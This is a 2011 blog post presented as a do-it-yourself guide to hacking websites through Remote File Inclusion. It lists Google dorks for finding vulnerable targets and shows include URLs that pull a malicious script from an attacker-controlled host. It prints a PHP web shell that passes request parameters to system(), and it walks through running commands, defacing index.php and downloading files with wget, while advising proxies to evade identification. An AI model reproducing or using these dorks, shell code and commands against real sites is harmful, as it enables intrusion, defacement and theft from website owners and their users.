Monday, May 30, 2011

Hacking with RFI

Remote File Inclusion
Ever heard of RFI? Well, this is the guide on how to do it!


Introduction


RFI stands for Remote File Inclusion, and it allows the attacker to upload a custom-coded/malicious file on a website or server using a script. The vulnerability exploits the poor validation checks in websites and can eventually lead to code execution on server or code execution on website (XSS attack using javascript).

Whoa there buddy, that was pretty technical. If you didn't understand that, either because you're new to hacking or a script kiddie, calm down. Put in the simplest of terms, we can use this method to deface a website. Yay! Script kiddies rejoice!

Now, before you go all "get back to the SQLI" on me, let me just say, RFI is an EXTREMELY common exploit. In fact, its definitely equally as popular as SQLI, its just a whole lot less famous. If anything, RFI is actually easier than SQLI, and if you follow this tutorial, really doesn't require much skill at all.

Using RFI you can deface a website, steal sensitive information, get access to the server, and really have your way with it.

Without further ado, let's begin.


What You Need to Know


Its not required, but highly suggested, to have some hacking experience. I know I said it was "easier than SQLI", but that's only half true. Once you become a good hacker, you'll find RFI to be insanely simple (and super fun/easy), however in some ways, it is a bit more complex and involved (as far as programming goes).

With this tutorial it won't be hard to follow along, but you will need to pay attention.

It is also likely you'll want some experience using a computer, and some experience programming. By the way, when I say "programming", I mean everything from markup to scripting to assembly.
For RFI, it can be helpful to know HTML, BASH, and especially PHP. You can learn most of them easily online.


D.I.Y. Tutorial


This is a D.I.Y. (do it yourself) tutorial, meaning that after reading this tutorial, or just following along with it, you will be ready to perform this exploit. I would highly suggest that you completely read and understand the entire tutorial prior to beginning.

Remember, if you are actually performing RFI to use a proxy and protect your identity - stay anonymous. Also, please read the disclaimer before beginning.

The first step is to find a vulnerable website. You can do this very quickly and easily by using Google dorks. 
Here are five dorks to get you started (each on their own line), however there are literally thousands more.
Code:
/includes/header.php?systempath=
/Gallery/displayCategory.php?basepath=
/index.inc.php?PATH_Includes=
/nphp/nphpd.php?nphp_config[LangFile]=
/include/db.php?GLOBALS[rootdp]=
more dorks available here

If you don't know how to use Google dorks, well, you really better learn how, as they're vital to any form of hacking (and even just effectively using Google). There's no sense in reinventing the wheel in this tutorial.

Okay, let's assume that we have successfully located an exploitable website (a website vulnerable to RFI). 
For now, we'll call our victim site (the site we are exploiting) "http://victimsite.com/" and our own site (the hacker's site) "http://hackersite.com/".

So, let's say we have our website:
Code:
http://victimsite.com/index.php?page=home
This website pulls documents stored in text format from server and renders them as web pages. We can find ways around it as it uses the PHP include function to pull them out.

Let's check it out...

Code:
http://victimsite.com/index.php?page=http://hackersite.com/badscript.txt
In that code section, you can see what we're doing. We are including a file called "badscript.txt" - we can assume that inside is a bad (malicious) script.

We can actually break this down into a few parts, for clarity purposes:

http://victimsite.com/index.php?page=http://hackersite.com/badscript.txt

You'll see that the first blue part is where we have the victim's original site. This is the exploitable site that we found through Google dorks.

In red we have our site, or the "hacker's site". This is a site owned/controlled by a hacker.

And finally, in green we have the "bad script", which is the malicious script we'll be including in our attack - badscript.txt is the Remote File in Remote File Inclusion, and the whole thing actually makes up the inclusion process.

Now, if it truly is vulnerable website, one of three cases will happen:
  • Case 1 - You might have noticed that the URL consisted of “page=home” had no extension, but I have included an extension in my URL, hence the site may give an error like “failure to include badscript.txt.txt”, this might happen as the site may be automatically adding the .txt extension to the pages stored in server.
  • Case 2 - In this case, it automatically appends something in the lines of .php then we have to use a null byte “” in order to avoid error.
  • Case 3 – Successful execution - you hacked it 

Now, once you have battled around this one, you might want to learn what to code inside the script. You may get a custom coded infamous C99 script (too bloaty but highly effective once deployed) or you might code yourself a new one. For this knowledge of PHP might come in handy.

Examine the code below:

Code:
<?php

echo "<script>alert(U 4r3 0wn3d !!);</script>"; 
echo "Run command: ".htmlspecialchars($_GET['cmd']);

system($_GET['cmd']);

?>
The above code allows you to exploit the include function and tests if the site is RFI (XSS) vulnerable by running the alert box code and if successful, you can send custom commands to the Linux server in BASH. 

So, if you are in luck and if it worked, let's try out some Linux commands. For example, to find the current working directory of server and then to list files, we will be using “pwd” and “ls” commands.

Code:
http//victimsite.com/index.php?cmd=pwd&page=http://hackersite.com/ourscript

http//victimsite.com/index.php?cmd=ls&page=http://hackersite.com/ourscript
It sends the command as cmd we put in our script, and begins to print the working directory and list the documents. Even better, you can almost make the page proclaim that you hacked it by using the “echo” command:

Code:
cmd=echo HACKED> index.php
It will then re-write the index.php and render it. In case its a primitive website which stores pages with .txt extension, you might want to put it with the .txt files. Now, as expected, we are the alpha and the omega of the website. We can download, remove, rename, anything! 
Want to download stuff? Try the “wget” function ("cmd=wget..." get the idea...?). Want to move it out? Try the "mv" function.

The rest is up to your own brilliant mind.


Disclaimer


RFI (remote file inclusion) is a form of illegal hacking. It is illegal to gain entry to websites without proper permission from the owner of the website and web server. Any hacking techniques in this thread are for educational purposes only. I do not support or partake in illegal hacking. I am not responsible for your actions (or the actions of others). I am not responsible for the consequences of your actions (or the consequences of others). I am not accountable/responsible for how you use this guide.




No comments:

Post a Comment